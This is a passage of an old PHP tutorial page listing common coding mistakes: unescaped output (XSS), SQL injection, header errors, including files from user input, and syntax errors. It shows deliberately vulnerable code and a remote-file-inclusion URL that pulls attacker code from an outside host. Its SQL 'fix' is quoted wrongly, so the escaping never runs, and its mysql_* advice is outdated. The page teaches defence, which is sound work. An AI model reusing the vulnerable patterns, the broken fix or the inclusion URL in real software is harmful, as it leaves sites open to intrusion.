Free Php Scripts, Articles and Resources
    home  Home   php  PHPscripts   articles  Articles   contact  Contact
Date: 13 March 2010
in

Total scripts: 203
Total downloads: 25548
Total articles: 11

Latest Scripts
Free Contact Us Script +...
Free PHP ODP Script

Top Downloaded Scripts
Captcha Security Images
dGallery

Best Rated Scripts
File Searcher
Transparent Watermark

CATEGORIES

PHP ARTICLES

<< All Php Articles



 
10 most common problems and mistakes done by PHP coders
 
     

1. Not escaping entities

It's basic knowledge; ALL untrusted input (especially user input from forms) has to be sanitized before it is being output.

echo $_GET['username'];


Can for instance output:
/*snooping cookie or changing admin password script*/

It is an apparent security risk not to sanitize untrusted data before output. Besides you might end up with pages looking very messy if you do not thread user input the right way.


How to fix it:
Basically you need to convert < , >, ' and " to their proper entities (< ,> ' , and ") . The functions htmlspecialchars and htmlentities() do the work.

So here is the right way:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

Uncountable scripts carries this problem.

2. Not Escaping SQL input

When querying your database all ways make sure untrusted data gets escaped else your application will be vulnerable to SQL-injections and unreliable, some coders think that they have covered their asses by having magic_quotes on in their php.ini. The problem is that untrusted input can come from other sources than $_GET, $_POST and $_COOKIE (crawling other websites or using input from the database). And what happens if magic_quotes suddenly is set to OFF?

How to fix it:
I recommend setting magic_quotes to off in php.ini or by using .htaccess and then using mysql_real_escape_string() on all variables used in SQL-expressions.


$sql = "UPDATE users SET
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>

In PHP5 combined with mysql5 you can also use bindings.

If you leave magic_quotes On you will just have to trust your instinct.

3. Wrong use of HTTP-header related functions: header(), session_start(), setcookie()

Have you ever encountered this warning? "warning: Cannot add header information - headers already sent [....]

Most likely you have either during development or when deploying PHP applications. When your browser downloads a web page the data response from the server is structured in two different parts: The header part and the content part.

The header consist of not visible data such as cookies to be set or if the browser should redirect to another location. The header always comes first.

The content part consists of the visible content HTML, image data and so on.

If output_buffering is set to Off in php.ini your. When the script outputs during execution all header related functions (setcookie(), header(), session_start()) must be called before any output. The problem is when somebody develops on one platform configuration and deploys to another platform configuration, then redirects stops working, cookies and sessions are not being stored...

How to fix it:
The right way is actually very simple make your script call all header related functions before you start any output and set output_buffering = Off in php.ini (at your development platform). If this is a problem on existing scripts you can all ways hack about with the output control functions.

4. Requiring and including files using untrusted data

Again and again do not trust data you do not declare implicitly: Including and requiring files from but not limited to $_GET, $_POST and $_COOKIE is a stupid and mortal path, you want to control which exacts code your server executes.

Example:
index.php

//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>

Any hacker can now request following URL: http://www.yourdomain.com/index.php?filename=anyfile.txt

By doing so the hacker can extract confidential information and execute PHP scripts stored on the server. Now if allow_url_fopen is set to On in your PHP.ini you will be doomed:

Try this one out:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

Then your script include and parse any code which the web page on http://www.youaredoomed.com/phphack.php outputs. Doing so he can for instance send spam mails, change passwords, delete files.... I have a very limited imagination.

 How to fix it:
 You have to control which files the script is allowed to include and which it is not allowed to include.

Note: This is only a quick fix:

//Include only files that are allowed.
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit('not allowed');
}
?>



5. Syntax errors

This covers all the parse and syntax errors YOU make during development, these are probably uncountable, right? Usually it is a bracket, semi-colon, quotation mark or parenthesis that is missing or placed wrong it is a time eater and that is why I have put it on the list. There is only one way to fight it: Become aware of which syntax errors you make and find ways to avoid repeating them! Of course a good text editor will help you a lot here please, do not use notepad.
 
... 
 
Read the rest of the article here:

http://www.sourcerally.net/regin/8-The-PHP-coder%27s-top-10-mistakes-and-problems

 
<< All Php Articles


:: Home ::         :: PHP Scripts ::         :: PHP Articles ::         :: Contact :: Copyright © 2007 S.C. BitStone S.R.L. www.bitstone.eu